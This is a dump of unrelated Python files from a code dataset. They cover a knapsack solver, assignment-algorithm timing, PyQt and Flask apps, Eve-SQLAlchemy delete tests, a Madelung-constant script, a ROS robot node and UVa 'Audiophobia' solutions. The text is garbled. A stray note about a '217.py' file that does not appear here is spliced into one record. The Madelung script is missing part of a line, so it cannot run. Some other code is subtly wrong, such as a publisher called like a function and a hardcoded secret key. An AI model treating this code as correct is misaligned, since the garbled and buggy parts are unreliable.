0\n        key = (totalItems - currentItem -1, size)\n        if key in cache:\n            return cache[key]\n        elif items[currentItem][1] > size:\n            maxValue = inner(items, size, totalItems, currentItem+1, cache)\n        else:\n            maxValue = max(items[currentItem][0] + inner(items, size-items[currentItem][1], totalItems, currentItem+1, cache),\n                           inner(items, size, totalItems, currentItem+1, cache))\n\n        cache[key] = maxValue\n        return maxValue\n    return inner(items, size, len(items), 0, cache)\n\ndef reconstruct(A, items):\n    result = []\n    j = len(A)-1\n    i = len(A[j])-1\n    while j > 1:\n        if A[j][i] != A[j][i-1]:\n            result.append(i+1)\n            j -= items[i][1]\n        i -= 1\n    return result\n\ndef load_items(filename):\n    \"\"\" Generate graph path from text file \"\"\"\n    file = open(filename, 'r')\n    # Map each line of test data to a line in the data list:\n    data = [ [int(y) for y in x.rstrip().split(' ')] for x in file]\n    return data\n\ndef print_result(result, reconstruct_flag=False):\n    for i in range(len(result)-1, -1, -1):\n        print(i,result[i])\n    print('  '+' '.join([str(x) for x in range(1,len(items)+1)]))\n    print(\"Optimal Value: %s\" % result[-1][-1])\n    if reconstruct_flag == True:\n        print(\"Items Chosen: %s\" % reconstruct(result, items))\n\nif __name__ == '__main__':\n    items = [(3,4)\n            ,(2,3)\n            ,(4,2)\n            ,(4,3)\n            ]\n    result = knapsack(items, 6)\n    print_result(result, 
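For 217.py above, a set gives the same duplicate test in one expression and is a convenient correctness check against the hash-map version:

def contains_duplicate(nums):
    # A set drops duplicates, so the lengths differ iff a duplicate exists.
    return len(set(nums)) < len(nums)

assert contains_duplicate([1, 2, 3, 1])
assert not contains_duplicate([1, 2, 3, 4])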
True)\n\n","sub_path":"dynamic/01knapsack.py","file_name":"01knapsack.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"391976240","text":"import improvedMunkres\r\nimport time\r\nimport numpy as np\r\nimport matplotlib.pylab as plt\r\nimport ver2\r\nimport pandas as pd\r\n\r\ncolors = ['r.-', 'g.-', 'b.-', 'y.-', 'c.-', 'm.-']\r\n\r\ndef change_N(Max, k, end,n_loop):\r\n\r\n data = [[], [], []]\r\n\r\n for N in range(100, end, 100):\r\n\r\n mode2 = 0\r\n mode3 = 0\r\n\r\n for loop in range(n_loop):\r\n\r\n s = np.random.rand(N, 2) * Max\r\n e = np.random.rand(N, 2) * Max\r\n\r\n start_time = time.time()\r\n improvedMunkres.improved_munkres(s, e, Max, N, k)\r\n print(\"%d---%s seconds ---\" % (N,time.time() - start_time))\r\n mode2 += time.time() - start_time\r\n\r\n start_time = time.time()\r\n ver2.improved_munkres(s, e, Max, N, k)\r\n print(\"%d---%s seconds ---\" % (N,time.time() - start_time))\r\n mode3 += time.time() - start_time\r\n\r\n data[0].append(N)\r\n data[1].append(mode2 / n_loop)\r\n data[2].append(mode3/n_loop)\r\n\r\n dataframe = pd.DataFrame(data)\r\n dataframe.to_csv(\"data.csv\")\r\n\r\ndef change_cluster(Max,N, start, end ,jump ,n_loop):\r\n\r\n data = [[],[]]\r\n\r\n for k in range(start, end, jump):\r\n\r\n result = 0\r\n\r\n s = np.random.rand(N, 2) * Max\r\n e = np.random.rand(N, 2) * Max\r\n\r\n s_time = time.time()\r\n result = ver2.improved_munkres(s, e, Max, N, k)\r\n time_result = time.time()-s_time\r\n\r\n data[0].append(k)\r\n data[1].append(result)\r\n\r\n print(k)\r\n\r\n dataframe = pd.DataFrame(data)\r\n dataframe.to_csv(\"err_data.csv\")\r\n\r\n\r\nchange_N(1, 100, 1100, 1)\r\n# change_cluster(1,1000,10,20,10,1)","sub_path":"fu.py","file_name":"fu.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"85993281","text":"import os\nimport logging\n\nif os.getenv('FLASK_ENV', 'prod') != 'prod':\n config_name = 'dev'\nelse:\n config_name = 'prod'\n\n\nsettings = {}\nwith open('instance/{0}.cfg'.format(config_name)) as f:\n for line in f:\n if line == '\\n':\n continue\n (key, val) = line.split('=')\n settings[key.strip()] = val.strip()\n\n\nlog_conversion = {'DEBUG': logging.DEBUG, 'INFO': logging.INFO}\nlog_level = log_conversion[settings['LOG_LEVEL']]\n\nfetch_wait_secs = 60 * 15 # 15 minutes","sub_path":"scraper/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"145440181","text":"#!usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport sys\r\nfrom PyQt5.QtWidgets import QDialog, QFileDialog\r\nfrom matplotlib import pyplot as plt\r\nfrom ui_figure import *\r\nfrom ccd_plot import CCDReader\r\n\r\nclass Dialog(QDialog):\r\n\r\n def browsecache(self):\r\n\r\n cachedir = QFileDialog.getExistingDirectory(self)\r\n\r\n self.ui.browsecacheline.setText(cachedir)\r\n\r\n return None\r\n\r\n def browsejson(self):\r\n\r\n jsondir = QFileDialog.getExistingDirectory(self)\r\n\r\n self.ui.browsejsonline.setText(jsondir)\r\n\r\n return None\r\n\r\n def browseoutput(self):\r\n\r\n outputdir = QFileDialog.getExistingDirectory(self)\r\n\r\n self.ui.browseoutputline.setText(outputdir)\r\n\r\n return None\r\n\r\n def __init__(self):\r\n\r\n super(Dialog, self).__init__()\r\n\r\n # set up the user interface from Qt Designer\r\n self.ui = 
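recursive_knapsack in 01knapsack.py above threads a cache dict by hand; functools.lru_cache expresses the same memoized recurrence more idiomatically (a sketch using the same (value, weight) item format):

from functools import lru_cache

def knapsack_memo(items, size):
    @lru_cache(maxsize=None)
    def best(i, capacity):
        # Max value achievable with items[i:] within the remaining capacity.
        if i == len(items) or capacity <= 0:
            return 0
        value, weight = items[i]
        skip = best(i + 1, capacity)
        if weight > capacity:
            return skip
        return max(skip, value + best(i + 1, capacity - weight))
    return best(0, size)

assert knapsack_memo(((3, 4), (2, 3), (4, 2), (4, 3)), 6) == 8  # items 3 and 4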
Ui_Form()\r\n\r\n self.ui.setupUi(self)\r\n\r\n self.ui.browsecachebutton.clicked.connect(self.browsecache)\r\n\r\n self.ui.browsejsonbutton.clicked.connect(self.browsejson)\r\n\r\n self.ui.browseoutputbutton.clicked.connect(self.browseoutput)\r\n\r\n self.ui.plotbutton.clicked.connect(self.plot)\r\n\r\n self.ui.exitbutton.clicked.connect(self.exit_plot)\r\n\r\n def plot(self):\r\n\r\n cachedir = self.ui.browsecacheline.text()\r\n\r\n jsondir = self.ui.browsejsonline.text()\r\n\r\n outputdir = self.ui.browseoutputline.text()\r\n\r\n arccoords = self.ui.arccoordsline.text()\r\n\r\n hval = self.ui.hline.text()\r\n\r\n vval = self.ui.vline.text()\r\n\r\n drawmodelfit = self.ui.radiomodelfit.isChecked()\r\n\r\n drawmaskedobs = self.ui.radiomasked.isChecked()\r\n\r\n ccd_curves = CCDReader(h=int(hval), v=int(vval), cache_dir=str(cachedir),\r\n json_dir=str(jsondir), arc_coords=str(arccoords), output_dir=str(outputdir),\r\n drawmodelfit=drawmodelfit, drawmaskedobs=drawmaskedobs)\r\n return None\r\n\r\n def exit_plot(self):\r\n\r\n self.close()\r\n\r\n plt.close(\"all\")\r\n\r\n sys.exit(0)\r\n\r\n return None\r\n","sub_path":"build_qt.py","file_name":"build_qt.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"241957184","text":"from easydict import EasyDict as edict\n\n# initalization\n__C_FDST = edict()\ncfg_data = __C_FDST\n__C_FDST.DATASET = 'FDST'\n\n# dataset parameters\n__C_FDST.STD_SIZE = (1080, 1920)\n__C_FDST.TRAIN_SIZE = (360, 640)\n__C_FDST.DATA_PATH = ''\n__C_FDST.MEAN_STD = ([0.484614104033, 0.455819487572, 0.432390660048], [\n 0.23891659081, 0.229008644819, 0.226914435625])\n\n# standard data parameters\n__C_FDST.LABEL_FACTOR = 1\n__C_FDST.LOG_PARA = 100.\n\n# training parameters\n__C_FDST.TRAIN_BATCH_SIZE = 1\n__C_FDST.TRAIN_DOWNRATE = 3\n\n# validation parameters\n__C_FDST.VAL_BATCH_SIZE = 1\n","sub_path":"adacrowd/datasets/baselines/FDST/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"9951557","text":"from datetime import datetime\nfrom eve_sqlalchemy.tests import TestBaseSQL\nfrom eve.tests.utils import DummyEvent\nfrom eve import ETAG\n\n\nclass TestDeleteSQL(TestBaseSQL):\n\n def setUp(self, settings_file=None, url_converters=None):\n super(TestDeleteSQL, self).setUp(settings_file, url_converters)\n # Etag used to delete an item (a contact)\n self.etag_headers = [('If-Match', self.item_etag)]\n\n def test_unknown_resource(self):\n url = '%s%s/' % (self.unknown_resource_url, self.item_id)\n _, status = self.delete(url)\n self.assert404(status)\n\n def test_delete_from_resource_endpoint(self):\n r, status = self.delete(self.known_resource_url)\n self.assert204(status)\n r, status = self.parse_response(self.test_client.get(\n self.known_resource_url))\n self.assert200(status)\n self.assertEqual(len(r['_items']), 0)\n\n def test_delete_from_resource_endpoint_different_resource(self):\n r, status = self.delete(self.different_resource_url)\n self.assert204(status)\n r, status = self.parse_response(self.test_client.get(\n self.different_resource_url))\n self.assert200(status)\n self.assertEqual(len(r['_items']), 0)\n\n # deletion of 'users' will still lave 'contacts' untouched (same db\n # collection)\n r, status = self.parse_response(self.test_client.get(\n self.known_resource_url))\n self.assert200(status)\n self.assertEqual(len(r['_items']), 25)\n\n 
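The MEAN_STD pair in the FDST setting above is a per-channel dataset statistic. A sketch of how such numbers are usually derived from the training images (assumes a directory containing only RGB images; uses PIL and numpy):

import os
import numpy as np
from PIL import Image

def compute_mean_std(image_dir):
    # Accumulate running sums so the whole dataset never sits in memory.
    n, s, s2 = 0, np.zeros(3), np.zeros(3)
    for name in os.listdir(image_dir):
        img = np.asarray(Image.open(os.path.join(image_dir, name)).convert('RGB'),
                         dtype=np.float64) / 255.0
        px = img.reshape(-1, 3)
        n += px.shape[0]
        s += px.sum(axis=0)
        s2 += (px ** 2).sum(axis=0)
    mean = s / n
    std = np.sqrt(s2 / n - mean ** 2)
    return mean.tolist(), std.tolist()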
def test_delete_empty_resource(self):\n url = '%s%s/' % (self.empty_resource_url, self.item_id)\n _, status = self.delete(url)\n self.assert404(status)\n\n def test_delete_readonly_resource(self):\n _, status = self.delete(self.readonly_id_url)\n self.assert405(status)\n\n def test_delete_unknown_item(self):\n url = '%s%s/' % (self.known_resource_url, self.unknown_item_id)\n _, status = self.delete(url)\n self.assert404(status)\n\n def test_delete_if_match_missing(self):\n _, status = self.delete(self.item_id_url)\n self.assert403(status)\n\n def test_delete_if_match_disabled(self):\n self.app.config['IF_MATCH'] = False\n _, status = self.delete(self.item_id_url)\n self.assert204(status)\n\n def test_delete_ifmatch_bad_etag(self):\n _, status = self.delete(self.item_id_url,\n headers=[('If-Match', 'not-quite-right')])\n self.assert412(status)\n\n def test_delete(self):\n r, status = self.delete(self.item_id_url, headers=self.etag_headers)\n self.assert204(status)\n\n r = self.test_client.get(self.item_id_url)\n self.assert404(r.status_code)\n\n def test_delete_non_existant(self):\n url = self.item_id_url[:-5] + \"00000\"\n r, status = self.delete(url, headers=self.etag_headers)\n self.assert404(status)\n\n def test_delete_different_resource(self):\n r, status = self.delete(self.user_id_url,\n headers=[('If-Match', self.user_etag)])\n self.assert204(status)\n\n r = self.test_client.get(self.user_id_url)\n self.assert404(r.status_code)\n\n def test_delete_with_post_override(self):\n # POST request with DELETE override turns into a DELETE\n headers = [('X-HTTP-Method-Override', 'DELETE'),\n ('If-Match', self.item_etag)]\n r = self.test_client.post(self.item_id_url, data={}, headers=headers)\n self.assert204(r.status_code)\n\n def test_delete_subresource(self):\n _db = self.app.data.driver\n\n # create random person\n fake_person = self.test_sql_tables.People.\\\n from_tuple(self.random_people(1)[0])\n fake_person._created = datetime.now()\n fake_person._updated = datetime.now()\n _db.session.add(fake_person)\n _db.session.commit()\n fake_person_id = fake_person._id\n fake_invoice = self.test_sql_tables.Invoices(number=4)\n fake_invoice.people_id = fake_person._id\n fake_invoice._created = datetime.now()\n fake_invoice._updated = datetime.now()\n _db.session.add(fake_invoice)\n _db.session.commit()\n\n # grab parent collection count; we will use this later to make sure we\n # didn't delete all the users in the database. 
We add one extra invoice\n # to make sure that the actual count will never be 1 (which would\n # invalidate the test)\n response, status = self.get('invoices')\n invoices = len(response[self.app.config['ITEMS']])\n\n # verify that the only document retrieved is referencing the correct\n # parent document\n response, status = self.get('users/%s/invoices' % fake_person_id)\n person_id = response[self.app.config['ITEMS']][1]['people']['_id']\n self.assertEqual(person_id, fake_person_id)\n\n # delete all documents at the sub-resource endpoint\n response, status = self.delete('users/%s/invoices' % fake_person_id)\n self.assert204(status)\n\n # verify that the no documents are left at the sub-resource endpoint\n response, status = self.get('users/%s/invoices' % fake_person_id)\n self.assertEqual(len(response['_items']), 0)\n\n # verify that other documents in the invoices collection have not been\n # deleted\n response, status = self.get('invoices')\n self.assertEqual(len(response['_items']), invoices - 2)\n\n def test_delete_subresource_item(self):\n _db = self.app.data.driver\n\n # create random person\n fake_person = self.test_sql_tables.People.\\\n from_tuple(self.random_people(1)[0])\n fake_person._created = datetime.now()\n fake_person._updated = datetime.now()\n _db.session.add(fake_person)\n _db.session.commit()\n fake_person_id = fake_person._id\n fake_invoice = self.test_sql_tables.Invoices(number=4)\n fake_invoice.people_id = fake_person._id\n fake_invoice._created = datetime.now()\n fake_invoice._updated = datetime.now()\n _db.session.add(fake_invoice)\n _db.session.commit()\n fake_invoice_id = fake_invoice._id\n\n # GET all invoices by new contact\n response, status = self.get('users/%s/invoices/%s' %\n (fake_person_id, fake_invoice_id))\n etag = response[ETAG]\n\n headers = [('If-Match', etag)]\n response, status = self.delete('users/%s/invoices/%s' %\n (fake_person_id, fake_invoice_id),\n headers=headers)\n self.assert204(status)\n\n def delete(self, url, headers=None):\n r = self.test_client.delete(url, headers=headers)\n return self.parse_response(r)\n\n\nclass TestDeleteEvents(TestBaseSQL):\n\n def test_on_pre_DELETE_for_item(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_pre_DELETE += devent\n self.delete_item()\n self.assertEqual('people', devent.called[0])\n self.assertFalse(devent.called[1] is None)\n\n def test_on_pre_DELETE_resource_for_item(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_pre_DELETE_people += devent\n self.delete_item()\n self.assertFalse(devent.called is None)\n\n def test_on_pre_DELETE_for_resource(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_pre_DELETE += devent\n self.delete_resource()\n self.assertFalse(devent.called is None)\n\n def test_on_pre_DELETE_resource_for_resource(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_pre_DELETE_people += devent\n self.delete_resource()\n self.assertFalse(devent.called is None)\n\n def test_on_pre_DELETE_dynamic_filter(self):\n def filter_this(resource, request, lookup):\n lookup[\"_id\"] = self.unknown_item_id\n self.app.on_pre_DELETE += filter_this\n # Would normally delete the known document; will return 404 instead.\n r, s = self.parse_response(self.delete_item())\n self.assert404(s)\n\n def test_on_post_DELETE_for_item(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_post_DELETE += devent\n self.delete_item()\n self.assertFalse(devent.called is None)\n\n def test_on_post_DELETE_resource_for_item(self):\n devent = 
DummyEvent(self.after_delete)\n self.app.on_post_DELETE_people += devent\n self.delete_item()\n self.assertFalse(devent.called is None)\n\n def test_on_post_DELETE_for_resource(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_post_DELETE += devent\n self.delete_resource()\n self.assertFalse(devent.called is None)\n\n def test_on_post_DELETE_resource_for_resource(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_post_DELETE_people += devent\n self.delete_resource()\n self.assertFalse(devent.called is None)\n\n def test_on_delete_resource(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_delete_resource += devent\n self.delete_resource()\n self.assertEqual(('people',), devent.called)\n\n def test_on_delete_resource_people(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_delete_resource_people += devent\n self.delete_resource()\n self.assertEqual(tuple(), devent.called)\n\n def test_on_deleted_resource(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_deleted_resource += devent\n self.delete_resource()\n self.assertEqual(('people',), devent.called)\n\n def test_on_deleted_resource_people(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_deleted_resource_people += devent\n self.delete_resource()\n self.assertEqual(tuple(), devent.called)\n\n def test_on_delete_item(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_delete_item += devent\n self.delete_item()\n self.assertEqual('people', devent.called[0])\n self.assertEqual(\n self.item_id, devent.called[1][self.app.config['ID_FIELD']])\n\n def test_on_delete_item_people(self):\n devent = DummyEvent(self.before_delete)\n self.app.on_delete_item_people += devent\n self.delete_item()\n self.assertEqual(\n self.item_id, devent.called[0][self.app.config['ID_FIELD']])\n\n def test_on_deleted_item(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_deleted_item += devent\n self.delete_item()\n self.assertEqual('people', devent.called[0])\n self.assertEqual(\n self.item_id, devent.called[1][self.app.config['ID_FIELD']])\n\n def test_on_deleted_item_people(self):\n devent = DummyEvent(self.after_delete)\n self.app.on_deleted_item_people += devent\n self.delete_item()\n self.assertEqual(\n self.item_id, devent.called[0][self.app.config['ID_FIELD']])\n\n def delete_resource(self):\n self.test_client.delete(self.known_resource_url)\n\n def delete_item(self):\n return self.test_client.delete(\n self.item_id_url, headers=[('If-Match', self.item_etag)])\n\n def before_delete(self):\n db = self.connection.session\n return db.query(self.test_sql_tables.People).\\\n get(self.item_id) is not None\n\n def after_delete(self):\n return not self.before_delete()\n","sub_path":"eve_sqlalchemy/tests/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":11528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"148769815","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nbasisVectors = [[1.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,1.0]]\nminVectorComponent = 1.0\nmaxVectorComponent = 1.0\n\ndef getNIonsInRadius(radius,sieve):\n\tnIons = 0\n\tk = int (radius+1)\n\tfor index1 in range(-k,k+1):\n\t\tfor index2 in range(-k,k+1):\n\t\t\tfor index3 in range(-k,k+1):\n\t\t\t\tx,y,z = getCoordFromBasis(index1,index2,index3)\n\t\t\t\tif getDistanceFromOrigin(x,y,z)nIonsLast:\n\t\t\tnIonsInShell.append(nIonsCurr-nIonsLast)\n\t\t\tmadelungConstant = 0\n\t\t\tfor i in range 
(len(nIonsInShell)):\n\t\t\t\tmadelungConstant+=pow(-1,i+1)*nIonsInShell[i]/pow(i+1,0.5)\n\t\t\tx.append(nShell)\n\t\t\ty.append(madelungConstant)\n\t\t\tif printVal:\n\t\t\t\tprint ('Shell: {} Number of Ions: {} Radius: {} Madelung Constant: {}'.format(nShell,(nIonsCurr-nIonsLast),radius,madelungConstant))\n\t\t\tnShell+=1\n\t\t\tnIonsLast = nIonsCurr\n\t\t\tnIonsCurr = 0\n\n\treturn x,y\n\t\nif __name__ == \"__main__\":\n\tx,y = getMadelungConstants(20)\n\tfig = plt.figure()\n\tax = fig.add_subplot(111)\n\tax.plot(x,y)\n\tplt.title('Madelung Constant as a Function of Number of Shells') \n\tplt.xlabel('Number of Shells')\n\tplt.ylabel('Madelung Constant')\n\tplt.show()\n","sub_path":"Week1Excercise_MadelungSeries.py","file_name":"Week1Excercise_MadelungSeries.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253849082","text":"#!/usr/bin/env python\n\nimport rospy\nimport json\nfrom numpy.random import randn \n\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom tf.transformations import quaternion_from_euler\n\nfrom humanoid_league_msgs.msg import Position2D\nfrom simulator.vision import Vision\n\n# The major concept needed to change is that the Robot does not cache the change of the pos of the ball, since the black board already cache the ball position. And in real time, it is the blackboard, or say the DSD to publish the positionInfo message\nclass Robot:\n def __init__(self, name):\n self._name = name\n\n # WARN the robot_pos stores the ground truth of the robot position\n self.robot_pos = Position2D()\n \n # no need to cache the subscriber\n rospy.Subscriber(\"/robots_pos\", String, self.rpos_callback)\n\n # but cache the publisher\n # publish the position with noise to topic /amcl_pose\n self.pos_pub = rospy.Publisher(\"/amcl_pose\", PoseWithCovarianceStamped, queue_size = 2)\n\n self.vision = Vision()\n\n def perform(self):\n self.vision.perform(self.robot_pos)\n self.pub_pose_with_noise()\n\n def pub_pose_with_noise(self):\n new_pos = PoseWithCovarianceStamped()\n # although I think it is important to fill all the blank in new_pos, but according to world_model_capsule, just fill \n # new_pos.header, \n # new_pos.pose.pose.x, \n # new_pos.pose.pose.y, \n # new_pos,pose.pose.orientation is ok\n new_pos.header.frame_id = \"map\"\n new_pos.header.stamp = rospy.Time.now()\n new_pos.pose.pose.position.x = self.add_random(self.robot_pos.pose.x)\n new_pos.pose.pose.position.y = self.add_random(self.robot_pos.pose.y)\n new_orient = quaternion_from_euler(0, 0, self.add_random(self.robot_pos.pose.theta))\n new_pos.pose.pose.orientation.x = new_orient[0]\n new_pos.pose.pose.orientation.y = new_orient[1]\n new_pos.pose.pose.orientation.z = new_orient[2]\n new_pos.pose.pose.orientation.w = new_orient[3]\n self.pos_pub(new_pos)\n \n def rpos_callback(self, inJson):\n inJson = inJson.data\n rpos_msg = json.loads(inJson)\n self.robot_pos.header.frame_id = rpos_msg['frame_id'].encode(\"utf-8\")\n secs = rpos_msg['stamp']['secs']\n nsecs = rpos_msg['stamp']['nsecs']\n self.robot_pos.header.stamp = rospy.Time(secs, nsecs)\n self.robot_pos.pose.x = rpos_msg[self._name]['x'] \n self.robot_pos.pose.y = rpos_msg[self._name]['y'] \n self.robot_pos.pose.theta = rpos_msg[self._name]['t'] \n self.robot_pos.confidence = rpos_msg[self._name]['c']\n rospy.loginfo(\"{} received x: {}, y: {}, theta{}\".format(self._name, rpos_msg[self._name]['x'], 
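As a cross-check for the shell-counting approach in Week1Excercise_MadelungSeries.py above, the NaCl Madelung constant can also be approximated by a direct alternating sum truncated to an expanding cube. Convergence is slow and oscillatory (boundary-weighted schemes such as Evjen's converge much faster), drifting toward roughly 1.7476 as n_max grows:

def madelung_direct(n_max):
    # Sum (-1)**(i+j+k) / r over all lattice sites in a cube, excluding the origin.
    total = 0.0
    for i in range(-n_max, n_max + 1):
        for j in range(-n_max, n_max + 1):
            for k in range(-n_max, n_max + 1):
                if i == j == k == 0:
                    continue
                total += (-1) ** ((i + j + k) % 2) / (i * i + j * j + k * k) ** 0.5
    return -total  # sign convention: positive Madelung constant for NaCl

print(madelung_direct(8))  # approaches ~1.7476 as n_max grows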
rpos_msg[self._name]['y'], rpos_msg[self._name]['t']))\n \n \"\"\"\n def bpos_callback(self, inJson):\n inJson = inJson.data\n bpos_msg = json.loads(inJson)\n self.ball_pos.header.frame_id = bpos_msg['frame_id'].encode(\"utf-8\")\n secs = bpos_msg['stamp']['secs']\n nsecs = bpos_msg['stamp']['nsecs']\n self.ball_pos.header.stamp = rospy.Time(secs, nsecs)\n self.ball_pos.ball_relative.x = bpos_msg['ball']['x'] \n self.ball_pos.ball_relative.y = bpos_msg['ball']['y'] \n self.ball_pos.confidence = bpos_msg['ball']['c'] \n \"\"\"\n\n def add_random(self, num):\n return num+float(randn(1))\n\ndef main():\n rospy.init_node('robot1')\n robot = Robot('robot1')\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n robot.perform()\n rate.sleep()\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/simulator/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113930622","text":"# https://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_problem&problem=989\n# Using Prim together with DFS/BFS. Complexity: O(t * s * log(c)) + O(t * q * (s + c))\nimport queue\nINF = float('inf')\nclass Node:\n def __init__(self, id, dist):\n self.id = id\n self.dist = dist\n def __lt__(self, other):\n return self.dist <= other.dist\n \n\ndef prim(source): # O (s * log(c))\n pq = queue.PriorityQueue()\n pq.put(Node(source, 0))\n dist[source] = 0\n while not pq.empty():\n top = pq.get()\n u = top.id\n visited[u] = True\n for neighbor in graph[u]:\n v = neighbor.id\n w = neighbor.dist\n if not visited[v] and dist[v] > w:\n dist[v] = w\n pq.put(Node(v, w))\n path[v] = u\n # print(path)\n # print(dist)\n for p in range(len(path)):\n if path[p] != -1:\n mst[p].append(Node(path[p], dist[p]))\n mst[path[p]].append(Node(p, dist[p]))\n return mst\n\n\ndef dfs(start, target, mst): # O (s + c)\n visited = [False] * len(mst)\n dist = [-INF for i in range(len(mst))] \n stack = []\n visited[start] = True\n stack.append(Node(start, 0))\n while len(stack) > 0:\n top = stack.pop()\n u = top.id\n if u == target:\n return dist[u]\n for v in mst[u]:\n if visited[v.id] == False:\n visited[v.id] = True\n stack.append(v)\n dist[v.id] = max(dist[u], v.dist)\n if dist[target] == -INF:\n return \"no path\"\n return dist[target]\n \n \ncase_no = 1\n\nwhile True:\n c, s, q = map(int, input().split())\n if c == 0 and s == 0 and q == 0:\n break\n if case_no != 1:\n print()\n graph = [[] for i in range(c)]\n \n for i in range(s):\n c1, c2, d = map(int, input().split())\n graph[c1 - 1].append(Node(c2 - 1, d))\n graph[c2 - 1].append(Node(c1 - 1, d))\n \n queries = []\n for j in range(q):\n q1, q2 = map(int, input().split())\n queries.append((q1 - 1, q2 - 1))\n\n print(\"Case #{}\".format(case_no))\n case_no += 1\n\n mst = [[] for i in range(c)]\n dist = [INF for i in range(c)]\n visited = [False for i in range(c)]\n path = [-1 for i in range(c)]\n # sum(si * log(ci)) ~ O(s * log(c))\n for i in range(c):\n if path[i] == -1:\n prim(i)\n # O (q * (s + c))\n for q1, q2 in queries:\n result = dfs(q1, q2, mst)\n print(result)\n\n\n\n# Using dynamic programming. 
Complexity: O(t * q * s * log(c))\nimport queue\nINF = float('inf')\nclass Node:\n    def __init__(self, id, dist):\n        self.id = id\n        self.dist = dist\n    def __lt__(self, other):\n        return self.dist <= other.dist\n\ndef dp(start, target):\n    dist = [INF for i in range(c)]\n#    visited = [False for i in range(c)]\n    pq = queue.PriorityQueue()\n    pq.put(Node(start, 0))\n    dist[start] = 0\n    while not pq.empty():\n        top = pq.get()\n        u = top.id\n#        visited[u] = True\n        for neighbor in graph[u]:\n            v = neighbor.id\n            w = neighbor.dist\n            if max(w, dist[u]) < dist[v]:\n                dist[v] = max(w, dist[u])\n                pq.put(Node(v, w))\n    return dist[target]\n\n\ncase_no = 1\n# O(t * q * c * log(s))\nwhile True:\n    c, s, q = map(int, input().split())\n    if c == 0 and s == 0 and q == 0:\n        break\n    if case_no != 1:\n        print()\n    graph = [[] for i in range(c)]\n    \n    for i in range(s):\n        c1, c2, d = map(int, input().split())\n        graph[c1 - 1].append(Node(c2 - 1, d))\n        graph[c2 - 1].append(Node(c1 - 1, d))\n    \n    queries = []\n    # O(q * c * log(s))\n    for j in range(q):\n        q1, q2 = map(int, input().split())\n        queries.append((q1 - 1, q2 - 1))\n\n    print(\"Case #{}\".format(case_no))\n    case_no += 1\n    for q1, q2 in queries:\n        result = dp(q1, q2)\n        if result == INF:\n            print(\"no path\")\n        else:\n            print(result)\n\n","sub_path":"UVa/audiophobia.py","file_name":"audiophobia.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"617854766","text":"from flask import Flask, render_template, redirect, request, session, flash\n\napp = Flask(__name__)\napp.secret_key = 'mysecretkey'\n\n@app.route('/')\ndef index():\n    return render_template(\"index.html\")\n\n\n@app.route('/users', methods=['POST'])\ndef users():\n    # Redirect back to the form when the required field is missing.\n    if not request.form['first']:\n        flash(\"first name is required\")\n        return redirect('/')\n\n    flash(\"success\")\n    # Assumes the index form posts fields named 'first', 'favlocation' and 'comment'.\n    name = request.form['first']\n    favlocation = request.form.get('favlocation', '')\n    comment = request.form.get('comment', '')\n    return render_template(\"userform.html\", name=name, favlocation=favlocation, comment=comment)\n\napp.run(debug=True)\n","sub_path":"Python/Flask_fun/counter/server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"84303816","text":"\n\"\"\" Class description goes here. 
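The dp() variant in audiophobia.py above re-relaxes nodes through a PriorityQueue keyed on the raw edge weight. A cleaner sketch of the same minimax ("bottleneck") Dijkstra with heapq, where the priority is the best-known maximum edge on the path (assumes graph[u] yields (neighbor, weight) pairs rather than Node objects):

import heapq

def minimax_path(graph, start, target):
    best = {start: 0}
    heap = [(0, start)]
    while heap:
        bottleneck, u = heapq.heappop(heap)
        if u == target:
            return bottleneck  # first pop of the target is optimal
        if bottleneck > best.get(u, float('inf')):
            continue  # stale heap entry
        for v, w in graph[u]:
            cand = max(bottleneck, w)
            if cand < best.get(v, float('inf')):
                best[v] = cand
                heapq.heappush(heap, (cand, v))
    return None  # no path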
